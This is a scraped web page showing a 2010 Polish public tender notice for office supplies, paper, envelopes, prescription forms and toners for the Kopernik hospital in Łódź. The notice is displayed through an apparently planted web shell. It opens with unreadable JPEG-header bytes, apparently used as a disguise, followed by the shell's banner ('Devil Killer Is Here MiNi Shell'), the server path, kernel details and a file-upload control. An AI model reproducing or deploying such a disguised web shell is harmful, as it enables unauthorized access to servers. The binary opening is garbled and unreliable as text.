JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100610/149983-N-2010.html

<p class="kh_header"><b>Łódź: Nr sprawy 57/10. : Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu  nieograniczonego  o  wartości  nie przekraczającej 193 000 EURO na dostawy materiałów biurowych dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi</b><br>
<b>Numer ogłoszenia: 149983 - 2010; data zamieszczenia: 10.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nr sprawy 57/10. : Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu  nieograniczonego  o  wartości  nie przekraczającej 193 000 EURO na dostawy materiałów biurowych dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zakup i dostawa materiałów biurowych, papierniczych i tonerów do faksów i kserokopiarek fabrycznie nowych i nierefabrykowanych, lub równoważnych w oryginalnych opakowaniach zamkniętych hermetycznie przez producenta wyszczególnionych asortymentowo i ilościowo w załączniku nr 2.
Przedmiot zamówienia został podzielony na 8 pakietów
PAKIET NR 1 - Materiały piśmienne i artykuły biurowe	KOD CPV 30190000-7 różny sprzęt i artykuły biurowe
PAKIET NR 2 - Papier ksero i składanka komputerowa	KOD CPV 30197644-2 papier kserograficzny KOD CPV 30199120-7 papier samokopiujący
PAKIET NR 3 - Koperty 	KOD CPV 30199230-1 koperty
PAKIET NR 4 - Papier video printer	KOD CPV 30197643-5 papier fotokopiujący
PAKIET NR 5 - Recepty	KOD CPV 22900000-9 różne druki
PAKIET NR 6 - Etykiety samoprzylepne	KOD CPV 30192800-9 etykiety samoprzylepne
PAKIET NR 7 - Tonery kalkowe do drukarek termotransferowych	KOD CPV 30125110-5 tonery do drukarek laserowych/faksów
PAKIET NR 8 - Tonery do kserokopiarek i faksów	30125120-8 tonery do fotokopiarek;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.44-2, 30.19.91.20-7, 30.19.92.30-1, 30.19.76.43-5, 22.90.00.00-9, 30.19.28.00-9, 30.12.51.10-5, 30.12.51.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, stosując formułę spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WSS im. M. Kopernika w Łodzi ul. Pabianicka 62, 93-512 Łódź, Kancelaria Szpitala.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2010 godzina 09:00, miejsce: WSS im. M. Kopernika w Łodzi ul. Pabianicka 62, 93-512 Łódź, Kancelaria Szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1 - materiały piśmienne i artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Blok z makulatury A4 w kratkę 100 kart.	szt.	150;
2.	cienkopis pisaki 0,4	szt.	2300;
3.	datownik automatyczny	szt.	5;
4.	deska z kliperem A4	szt.	500;
5.	długopisy  na wkłady wymienne typu Zenith lub równoważne	szt.	1 500;
6.	dziurkacze typu SAX 39 lub równoważne	szt.	100;
7.	etykiety termotransferowe 70 X 37 formacie A4	op.= 100 szt.	5;
8.	etykiety termotransferowe 104 X 149 formacie A4	op.= 100 szt.	10;
9.	grzbiety do bindownicy 12	op.= 20 szt.   100;
10.	grzbiety do bindownicy 19	op.= 20 szt.     20;
11.	gumka myszka	szt.	100;
12.	Kalka ołówkowa A-4	op.= 100 szt.	10;
13.	kalka techniczna A 4	op.= 100 szt.	30;
14.	Kieszeń foliowa  A-4	op.= 100 szt.	1000;
15.	Klej biurowy w płyn- 50 ml	szt.	800;
16.	klipsy do akt 3 CM	op.= 12 szt.	30;
17.	klipsy do akt 4 CM	op.= 12 szt.	60;
18.	klipsy do akt 5 CM	op.= 12 szt.	30;
19.	Korektory w pisaku płaskie typu PENTEL lub równoważne	szt.	700;
20.	linijki przeźroczyste 20 cm	szt.	60;
21.	linijki przeźroczyste 30 cm	szt.	60;
22.	Markery typu Scharpie Permanent czarne lub równoważne - średnie do pisania na szkle	szt.	2100;
23.	mazaki olejowe do opisywania przedmiotów (kolor do wyboru biały, srebrny, czerwony, czarny)	szt.	50;
24.	mazaki do pisania na płytach CD - FOLIOPISY z cienką końcówką do 0,5 mm	szt.	70;
25.	nożyczki  ze stali nierdzewnej 20 cm	szt.	50;
26.	okładki do bindownicy A4 przód przezroczysty,          tył nieprzezroczysty	kpl.	300;
27.	Ołówki HB	szt.	1000;
28.	Papier fax 210 x30 	rol.	150;
29.	Papier fax 216 x 30	rol.	80;
30.	Płyty CD	szt.	20 000;
31.	płyty CD-Print	szt.	42 000;
32.	płyty CD-RW BOX	szt.	100;
33.	płyty CD-ROM BOX	szt.	200;
34.	poduszki do pieczątek	szt.	250;
35.	poduszki do pieczątek No2	szt.	100;
36.	Segregatory A4 szerokość grzbietu 7 cm  lakierowany	szt.	2000;
37.	Segregatory A4 szerokość grzbietu 5 cm  lakierowany	szt.	1000;
38.	skoroszyty tekturowe A4 wpinane na haczyki do segregatorów 	szt.	500;
39.	skoroszyt plastikowy A4 bez grzbietu	szt.	500;
41.	skoroszyt  plastikowy A4 z grzbietem do wpinania do segregatorów oczkowy	szt.	2000;
40.	Skoroszyty  oczkowe A4 karton	szt.	3000;
42.	Skorowidze A-4 twarda oprawa	szt.	300;
43.	Spinacze biurowe małe	op.= 100 szt.	2000;
44.	Spinacze biurowe duże	op.= 100 szt.	1300;
45.	sznurek do wiązania  biały polipropylenowy   2000 mb	rol.	40;
46.	taśma pakowa                             szer. 5 cm	szt.	300;
47.	taśma przezroczysta          szer. 2 cm	szt.	200;
48.	taśma przylepna dwustronna wzmocniona na gąbce szerokość 2 cm	szt.	50;
49.	teczki wiązane tasiemką formatu A4	szt.	3 500;
50.	teczki akt osobowych z 3 przekładkami formatu A4	szt.	500;
51.	tusz do pieczątek 25 ml	szt.	500;
52.	tusz kreślarski czarny           25 ml	szt.	10;
53.	wąsy do segregatorów	op.= 100 szt.	200;
54.	wkłady do długopisów typu Zenith lub równoważne pasujące do długopisów  oferowanych w poz. Nr 5	szt.	250;
55.	wkłady żelowe handy intense lub równoważne	szt.	140;
56.	zakreślacze ( 4kolory )	kpl.	150;
57.	Zeszyt  A-5 - 96 kart.  w kratkę twarda oprawa	szt.	1200;
58.	Zeszyt A-4  - 96 kart. w kratkę twarda oprawa	szt.	3200;
59.	Zeszyt 2/3 A4 - 200 kart. w kratkę twarda oprawa	szt.	100;
60.	znaczniki samoprzylepne z folii kolorowej opakowanie 100 szt	opak.	60;
61.	zszywacz do akt zszywający do 100 kartek	szt.	5;
62.	zszywacz typu SAX 39 24/6 lub równoważny	szt.	110;
63.	Zszywki  24/6	op.= 1000 szt.	1 500;
64.	Zszywki  39/13	op.= 1000 szt.	250;
65.	Zszywki  23/8	op.= 1000 szt.	80;
66.	Zszywki  20/5	op.= 1000 szt.	60;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Papier ksero i składanka komputerowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Papier biały  A5	ryza= 500 arkuszy	500;
2.	Papier biały  A4	ryza= 500 arkuszy	10 500;
3.	Papier biały  A3	ryza= 500 arkuszy	70;
4.	Składanka komputerowa 250 mm x 12 cali  (1+ 0 kopii)	karton = 2000 składek	40;
5.	Składanka komputerowa 250 mm x 12 cali (1+ 1 kopia)	karton = 900 składek	10;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.91.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET  3 - Koperty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Koperta  C 6	op.=1000 szt	80;
2.	Koperta   C 5	szt.	                2 000;
3.	Koperta   B 5	szt.	                50 000;
4.	Koperta   B 5	op.=500 szt.	160;
5.	Koperta   B 4	op.=250 szt.	350;
6.	Koperta   B 4	szt.	                5 000;
7.	Koperta   B 3	szt.	                2 000;
8.	Koperta   23 cm x 37 cm	szt.	15 000;
9.	Koperta   23 cm x 32 cm	szt.	30 000;
10.	Koperta   37 cm x 37 cm RTG	szt.	10 000;
11.	Koperta   37 cm x 45 cm RTG	szt.	10 000;
12.	Koperta na CD	szt.	                62 000;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4 - papier video printer.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Papier Video Printer                      110 mm x 21 m	szt.	400;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.43-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5 - RECEPTY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Recepta druk wg przesłanych numeracji z NFZ	205x94  blok 100 kart. ilość bloczków	10 000;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6 - ETYKIETY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Etykieta samoprzylepna papier typu velum	        A-6   rolka =200 sztuk etykiet sztuk 1900;
2.	Etykieta samoprzylepna papier typu velum 	szer  x  wys.  60 x 40 rolka =1000 szt. etykiet	sztuk 1200;
3.	Etykieta samoprzylepna papier typu velum 	szer  x  wys.  80 x 40 rolka =1000 szt. etykiet	sztuk   150;
4.	Etykieta samoprzylepna papier typu velum  	szer  x  wys. 80  x  50 rolka =1000 szt. etykiet    sztuk	500;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.28.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET 7 - TONERY KALKOWE DO DRUKAREK TERMOTRANSFEROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Drukarka - DATAMAX CLASS DMX            E-4203	TRANSFER      (woskowo- żywiczna)	104 mm x 94 mb.   sztuk 100;
2.	Drukraka - ELTRON TLP 2742	TRANSFER      (woskowo- żywiczna)	64 mm x 74 mb rolek  200; 
3.	Drukarka TOSHIBA BSA            4 TM	TRANSFER            (woskowo- żywiczna)	89 mm x 300 mb.   rolek 120;
4.	Drukarka ELTRON TLP 2824	TRANSFER               (woskowo- żywiczna)	64 mm x 74 mb.  rolek  90;
5.	Drukarka ELTRON TLP 2824	TRANSFER               (woskowo- żywiczna)	64 mm x 74 mb.  rolek 36;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET 8 TONERY DO KSEROKOPIAREK I FAKSÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	SHARP AL 1217	AL 110 DC lub równoważny	10;
2.	KONICA 2028	KONICA 2028 lub równoważny	10;
3.	KONICA 1212	KONICA 1212 lub równoważny	18;
4.	KONICA 7020	KONICA 7020 lub równoważny	8;
5.	GESTETNER NRG MP 2510 PCL6	GESTETNER 2510 lub równoważny	25;
6.	Powielacz RICOH JP 1010	JP 6 lub równoważny	12;
7.	Powielacz RICOH JP 1010	matryca JP10-S lub równoważny	4;
8.	OLIVETTI d-COPIA 164/MF	OLIVETTI d-COPIA 163 MF6k lub równoważny	6;
9.	OLIVETTI d-COPIA 	OLIVETTI d-COPIA 150 lub równoważny	6;
10.	OLIVETTI d-COPIA 200/MF	OLIVETTI d-COPIA 160 /200MF lub równoważny	6;
11.	CANON NP6512	NPG11lub równoważny	50;
12.	CANON FC 230	E30 lub równoważny	5;
13.	CANON IR 2800	CANON C-EXV3 lub równoważny	10;
14.	CANON 	CANON C-EXV18 lub równoważny	10;
15.	CANON L100	CANON FX10 lub równoważny	10;
16.	CANON NP1010	CANON NP 1010/1020 lub równoważny	20;
17.	TOSHIBA 1360	1360 lub równoważny	16;
18.	RICOCH AFFICIO 1027	RICOCH AF 2220 D lub równoważny	24;
20.	KONICA MINOLTA BIZHUB C200	MINOLTA TN-214 CZARNY lub równoważny	5;
21.	KONICA MINOLTA BIZHUB C200	MINOLTA TN-214 CZERWONY lub równoważny	5;
22.	KONICA MINOLTA BIZHUB C200	MINOLTA TN-214 ŹÓŁTY	5;
23.	KONICA MINOLTA BIZHUB C200	MINOLTA TN-214 NIEBIESKI lub równoważny	5;
24.	KONICA MINOLTA MAGICOLOR 1690 MF	ZESTAW TONERÓW KONICA MINOLTA CMY 1690 CYAN/MAGENTA/YELLOW  AOV 30 NH lub równoważny	8;
25.	KONICA MINOLTA MAGICOLOR 1690 MF	MINOLTA 1690 BLACK lub równoważny	16;
26.	BROTHER DCP8070D	TN 3230 czarny lub równoważny	15;
tonery kalkowe do faksów	
27. PANASONIC KX FA 136 a lub równoważny	50;
28. PANASONIC KX FA 76 a lub równoważny	15;
29. PANASONIC KX FA 57 lub równoważny  	20;
30. PANASONIC KX FA 137 lub równoważny	30;
31. PANASONIC KX FA 52 lub równoważny	     10;
32. PANASONIC KX FA 134 lub równoważny	20;
33. PANASONIC KX FA 87 lub równoważny	     30;
34. PANASONIC KX FA 83 lub równoważny	     20;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.20-8.</p></li>
